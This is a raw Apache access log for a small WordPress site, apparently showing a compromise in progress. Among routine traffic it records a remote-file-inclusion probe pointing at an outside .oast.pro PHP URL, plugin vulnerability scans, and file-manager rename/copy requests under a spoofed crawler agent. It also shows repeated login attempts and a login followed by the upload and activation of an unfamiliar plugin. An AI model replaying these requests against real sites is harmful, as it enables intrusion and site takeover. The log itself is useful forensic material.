167.248.31.96 - - [26/Jan/2026:12:45:57 -0500] "GET / HTTP/1.1" 200 4446 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:58 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:58 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
158.220.122.128 - - [26/Jan/2026:12:46:17 -0500] "GET /wp-content/plugins/mainwp-vuln/readme.txt HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
64.59.72.148 - - [26/Jan/2026:12:47:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
15.235.98.202 - - [26/Jan/2026:12:48:45 -0500] "GET /?dir=%2Fhome%2Fhttpd%2Fhtml%2Fmatrixmodels.com%2Fpublic_html&mode=rename&old=wp-activate.php HTTP/1.1" 200 4465 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
158.220.122.128 - - [26/Jan/2026:12:48:53 -0500] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://d5qt79l6sltirialmjp05q9opxfumuh1o.oast.pro/JasqQsOo.php HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Thunderbird/140.0"
78.245.43.81 - - [26/Jan/2026:12:49:01 -0500] "GET /profile.php?id=732 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /profile.php?id=732 HTTP/1.1" 404 8466 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.6.16 HTTP/1.1" 200 51338 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /wp-content/themes/matrix-model/style.css?ver=5.6.16 HTTP/1.1" 200 41969 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 11224 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /wp-content/themes/matrix-model/images/inner-logo.jpg HTTP/1.1" 200 8330 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /wp-content/themes/matrix-model/js/navigation.js?ver=20140711 HTTP/1.1" 200 1516 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:03 -0500] "GET /wp-includes/js/wp-embed.min.js?ver=5.6.16 HTTP/1.1" 200 1478 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:02 -0500] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.5.1 HTTP/1.1" 200 89496 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:03 -0500] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.16 HTTP/1.1" 200 14229 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:03 -0500] "GET /wp-content/themes/matrix-model/images/title_bg.jpg HTTP/1.1" 200 1124 "https://matrixmodels.com/wp-content/themes/matrix-model/style.css?ver=5.6.16" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
78.245.43.81 - - [26/Jan/2026:12:49:03 -0500] "GET /favicon.ico HTTP/1.1" 200 43 "https://matrixmodels.com/profile.php?id=732" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36"
64.59.72.148 - - [26/Jan/2026:12:49:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
78.245.43.81 - - [26/Jan/2026:12:49:31 -0500] "-" 408 - "-" "-"
78.245.43.81 - - [26/Jan/2026:12:49:32 -0500] "-" 408 - "-" "-"
64.59.72.148 - - [26/Jan/2026:12:51:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
74.206.165.145 - - [26/Jan/2026:12:52:37 -0500] "POST /wp-cron.php?doing_wp_cron=1769449957.7967579364776611328125 HTTP/1.1" 200 - "http://matrixmodels.com/wp-cron.php?doing_wp_cron=1769449957.7967579364776611328125" "WordPress/5.6.16; http://matrixmodels.com"
188.166.35.151 - - [26/Jan/2026:12:52:37 -0500] "POST /wp-login.php HTTP/1.1" 200 7170 "-" "Mozilla/5.0"
64.59.72.148 - - [26/Jan/2026:12:53:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
180.252.92.29 - - [26/Jan/2026:12:53:45 -0500] "-" 408 - "-" "-"
15.235.98.237 - - [26/Jan/2026:12:55:20 -0500] "GET /tips-strategi-di-situs-slot88/ HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
64.59.72.148 - - [26/Jan/2026:12:55:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
180.252.92.29 - - [26/Jan/2026:12:55:57 -0500] "-" 408 - "-" "-"
180.252.92.29 - - [26/Jan/2026:12:55:57 -0500] "-" 408 - "-" "-"
52.204.81.148 - - [26/Jan/2026:12:56:25 -0500] "GET /robots.txt HTTP/1.1" 200 116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.0.41.164 - - [26/Jan/2026:12:56:29 -0500] "GET /anistasia-black-1/ HTTP/1.1" 200 12550 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.206.165.145 - - [26/Jan/2026:12:57:22 -0500] "POST /wp-cron.php?doing_wp_cron=1769450242.1346349716186523437500 HTTP/1.1" 200 - "http://matrixmodels.com/wp-cron.php?doing_wp_cron=1769450242.1346349716186523437500" "WordPress/5.6.16; http://matrixmodels.com"
64.59.72.148 - - [26/Jan/2026:12:57:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
176.223.173.96 - - [26/Jan/2026:12:58:37 -0500] "GET /otw-portfolio/amber-moore/ HTTP/1.1" 301 - "https://www.indexxx.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:37 -0500] "GET / HTTP/1.1" 200 4465 "https://www.indexxx.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:37 -0500] "GET /wp-content/themes/matrix-model/assets/css/bootstrap_v4.3.1_min.css HTTP/1.1" 200 155712 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/css/animate.min.css HTTP/1.1" 200 52592 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/css/custom.css HTTP/1.1" 200 5229 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/css/aos.css HTTP/1.1" 200 26053 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-1.jpg HTTP/1.1" 200 39164 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-2.jpg HTTP/1.1" 200 44619 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-3.jpg HTTP/1.1" 200 36068 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-6.jpg HTTP/1.1" 200 39553 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-4.jpg HTTP/1.1" 200 28534 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-5.jpg HTTP/1.1" 200 35264 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-9.jpg HTTP/1.1" 200 39513 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-7.jpg HTTP/1.1" 200 35534 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-8.jpg HTTP/1.1" 200 31506 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:38 -0500] "GET /wp-content/uploads/2021/07/logo.png HTTP/1.1" 200 181002 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:39 -0500] "GET /wp-content/themes/matrix-model/assets/images/logo/favicon.png HTTP/1.1" 404 259 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /our-models HTTP/1.1" 301 - "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /our-models/ HTTP/1.1" 200 7615 "https://matrixmodels.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.16 HTTP/1.1" 200 14229 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.6.16 HTTP/1.1" 200 51338 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /wp-content/themes/matrix-model/style.css?ver=5.6.16 HTTP/1.1" 200 41969 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.5.1 HTTP/1.1" 200 89496 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:41 -0500] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 11224 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:42 -0500] "GET /wp-content/themes/matrix-model/images/inner-logo.jpg HTTP/1.1" 200 8330 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:42 -0500] "GET /favicon.ico HTTP/1.1" 200 43 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
176.223.173.96 - - [26/Jan/2026:12:58:46 -0500] "GET /our-models/ HTTP/1.1" 200 7615 "https://matrixmodels.com/our-models/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15"
64.59.72.148 - - [26/Jan/2026:12:59:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
63.69.91.114 - - [26/Jan/2026:13:00:05 -0500] "POST /wp-login.php HTTP/1.1" 200 7310 "http://matrixmodels.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
63.69.91.114 - - [26/Jan/2026:13:00:05 -0500] "GET /wp-admin/ HTTP/1.1" 302 - "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
63.69.91.114 - - [26/Jan/2026:13:00:06 -0500] "GET /wp-login.php?redirect_to=http%3A%2F%2Fmatrixmodels.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 6901 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
66.249.70.135 - - [26/Jan/2026:13:00:06 -0500] "GET /?p=3354 HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.91.221.114 - - [26/Jan/2026:13:00:53 -0500] "GET /wp-content/uploads/2019/03/Alex-Grey_006.jpg HTTP/1.1" 200 134039 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/108.18.4 like Chrome/108.0.5359.220 Safari/537.36"
63.69.91.108 - - [26/Jan/2026:13:00:57 -0500] "GET /wp-content/plugins/drsfrhw/index.php HTTP/1.1" 200 14194 "http://matrixmodels.com/wp-content/plugins/drsfrhw/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
64.59.72.148 - - [26/Jan/2026:13:01:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
95.91.221.114 - - [26/Jan/2026:13:01:23 -0500] "-" 408 - "-" "-"
167.114.139.45 - - [26/Jan/2026:13:01:27 -0500] "GET /1-6/ HTTP/1.1" 200 12365 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
64.59.72.148 - - [26/Jan/2026:13:03:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
170.168.94.216 - - [26/Jan/2026:13:04:11 -0500] "GET /wp-login.php HTTP/1.1" 200 6901 "http://matrixmodels.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:04:13 -0500] "POST /wp-login.php HTTP/1.1" 302 - "http://matrixmodels.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
52.33.125.19 - - [26/Jan/2026:13:05:19 -0500] "GET / HTTP/1.1" 200 4446 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
64.59.72.148 - - [26/Jan/2026:13:05:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
149.154.161.250 - - [26/Jan/2026:13:05:47 -0500] "GET /wp-content/uploads/2019/06/01.jpg HTTP/1.1" 200 114209 "-" "TelegramBot (like TwitterBot)"
158.220.122.128 - - [26/Jan/2026:13:05:49 -0500] "GET /BSW_cxttongr.htm HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
64.59.72.148 - - [26/Jan/2026:13:07:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
142.44.228.214 - - [26/Jan/2026:13:07:30 -0500] "GET /?dir=%2Fhome%2Fhttpd%2Fhtml%2Fmatrixmodels.com%2Fpublic_html&mode=copy&src=wp-cron.php HTTP/1.1" 200 4465 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.206.165.145 - - [26/Jan/2026:13:08:28 -0500] "POST /wp-cron.php?doing_wp_cron=1769450908.7344400882720947265625 HTTP/1.1" 200 - "http://matrixmodels.com/wp-cron.php?doing_wp_cron=1769450908.7344400882720947265625" "WordPress/5.6.16; http://matrixmodels.com"
188.166.35.151 - - [26/Jan/2026:13:08:28 -0500] "POST /wp-login.php HTTP/1.1" 200 7170 "-" "Mozilla/5.0"
64.59.72.148 - - [26/Jan/2026:13:09:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
138.199.55.241 - - [26/Jan/2026:13:10:35 -0500] "-" 408 - "-" "-"
66.249.70.134 - - [26/Jan/2026:13:10:38 -0500] "GET /?p=6522 HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.76.203.18 - - [26/Jan/2026:13:11:11 -0500] "-" 408 - "-" "-"
64.59.72.148 - - [26/Jan/2026:13:11:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
170.168.94.216 - - [26/Jan/2026:13:12:03 -0500] "GET /wp-login.php HTTP/1.1" 200 6901 "http://matrixmodels.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:12:04 -0500] "POST /wp-login.php HTTP/1.1" 302 - "http://matrixmodels.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:12:06 -0500] "GET /wp-admin/profile.php HTTP/1.1" 200 43894 "http://matrixmodels.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:12:07 -0500] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 33596 "http://matrixmodels.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:12:10 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 25152 "http://matrixmodels.com/wp-admin/plugin-install.php?tab=upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:12:16 -0500] "GET /wp-admin/plugins.php?action=activate&plugin=acezholuc%2Facezholuc.php&_wpnonce=9773b6ebe3 HTTP/1.1" 302 - "http://matrixmodels.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
170.168.94.216 - - [26/Jan/2026:13:12:17 -0500] "GET /wp-admin/plugins.php?activate=true&plugin_status=all&paged=1&s= HTTP/1.1" 200 122880 "http://matrixmodels.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
34.76.200.20 - - [26/Jan/2026:13:12:30 -0500] "GET / HTTP/1.1" 301 - "-" "python-requests/2.32.5"
64.59.72.148 - - [26/Jan/2026:13:13:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
154.194.59.137 - - [26/Jan/2026:13:13:46 -0500] "GET / HTTP/1.1" 200 4446 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
216.73.216.1 - - [26/Jan/2026:13:13:47 -0500] "GET /robots.txt HTTP/1.1" 200 116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.1 - - [26/Jan/2026:13:13:47 -0500] "GET /otw-portfolio/harley-jameson HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
154.194.59.137 - - [26/Jan/2026:13:13:47 -0500] "GET / HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
138.199.55.241 - - [26/Jan/2026:13:14:17 -0500] "-" 408 - "-" "-"
138.199.55.241 - - [26/Jan/2026:13:14:18 -0500] "-" 408 - "-" "-"
138.199.55.241 - - [26/Jan/2026:13:14:18 -0500] "-" 408 - "-" "-"
154.194.59.137 - - [26/Jan/2026:13:14:09 -0500] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
154.194.59.137 - - [26/Jan/2026:13:14:31 -0500] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
154.194.59.137 - - [26/Jan/2026:13:14:37 -0500] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
154.194.59.137 - - [26/Jan/2026:13:14:49 -0500] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
154.194.59.137 - - [26/Jan/2026:13:14:52 -0500] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
154.194.59.137 - - [26/Jan/2026:13:14:55 -0500] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
138.199.55.241 - - [26/Jan/2026:13:15:09 -0500] "-" 408 - "-" "-"
64.59.72.148 - - [26/Jan/2026:13:15:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
